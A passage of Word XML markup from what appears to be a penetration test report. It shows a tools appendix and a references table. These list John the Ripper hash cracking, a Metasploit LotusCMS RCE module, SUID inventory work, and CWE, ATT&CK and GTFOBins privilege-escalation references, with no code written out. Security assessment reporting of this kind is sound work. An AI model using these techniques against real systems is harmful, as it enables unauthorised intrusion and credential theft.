              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>7.94</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39EEC38" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Service version identification on both assets; port enumeration with -p- against vendor-eval-01.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="449AC518" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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87E74B3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>OpenSSH client</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64FA7CD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>9.6p1 (Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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68E56D30" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Authenticated shell access to cassandra-stg-01 from the predicate of the engagement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="063D84D3" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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08810D3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>GNU find (system)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7EFA1FBA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>4.4.2 / 4.9.0</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CA021CC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>SUID inventory generation on both assets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6F49C2D0" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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11D53D8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>John the Ripper (jumbo)</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D2639FE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>1.9.0-jumbo-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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1E8BABC7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Offline cracking of MD5 password hash discovered in dev_accounts table (Finding F5).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6019BB42" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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7BC39760" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Metasploit Framework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9933AC8" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>6.4.7</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042DCB4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>LotusCMS RCE exploitation via exploit/multi/http/lcms_php_exec (Finding F2).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="1EDD9450" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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631B2F5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>mysql-client</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BAB54FE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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6E87502" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Database session against the vendor-eval-01 MySQL instance after credential discovery.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="2CDD3D3F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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58F7896" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>curl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C11DCD2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>8.5.0</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4514552" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Manual HTTP requests for vulnerability confirmation prior to Metasploit module use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E83674A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc229906610"/>
      <w:r>
        <w:t>Appendix B — References cited in this report</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3400"/>
        <w:gridCol w:w="4226"/>
        <w:gridCol w:w="900"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="36274DBB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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521E4DB6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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6F98120F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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37F9CC93" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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0529F84D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Last accessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="088B991C"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CDDDBC6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B1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644F06F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>CWE-269 Improper Privilege Management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DC879F7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://cwe.mitre.org/data/definitions/269.html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EFBAF94" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>02 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="02C71A45"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6E7D8090" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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FBA19C2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>CWE-732 Incorrect Permission Assignment</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17B14A7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://cwe.mitre.org/data/definitions/732.html</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69D3F0BB" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>02 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6A4D4219"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B4769F6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B3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DB8D23E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>CWE-798 Use of Hard-Coded Credentials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6667721" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://cwe.mitre.org/data/definitions/798.html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3F50854" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>02 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="3E0FF60A"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30EDB324" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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29FE41CC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>CWE-916 Hash With Insufficient Computational Effort</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1A2F0129" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://cwe.mitre.org/data/definitions/916.html</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184C3167" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>02 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="69B0A656"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55EAB43" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B5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BDCE3B6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>CWE-94 / CWE-95 (Code Injection / Eval Injection)</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41883B4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://cwe.mitre.org/data/definitions/94.html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B8147EA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>02 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="234D9145"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38EA1246" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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6CBE9E4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK — T1548.003 (Sudo / Sudo Caching)</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7D876DD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://attack.mitre.org/techniques/T1548/003/</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2654EE7A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>03 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="46544D76"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71CABA76" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B7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9603C21" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK — T1548.001 (Setuid / Setgid)</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BEF69D2" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://attack.mitre.org/techniques/T1548/001/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ABB8118" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>03 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="5AD94F16"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2B2C763E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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63C10236" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK — T1190 (Exploit Public-Facing Application)</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E7EBBB6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://attack.mitre.org/techniques/T1190/</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EF43D1C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>03 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="316D3039"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DBBD8C1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B9</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A77552F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK — T1552.001 (Credentials In Files)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F0BA339" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://attack.mitre.org/techniques/T1552/001/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C818F8F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>03 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="35A0E035"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4DFDB4A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>B10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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AEC84E4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>GTFOBins — find (SUID) and awk (Sudo) entries</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3EB304F5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>https://gtfobins.github.io/</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4D1F495" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>04 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="0E86F732"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77C61044" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
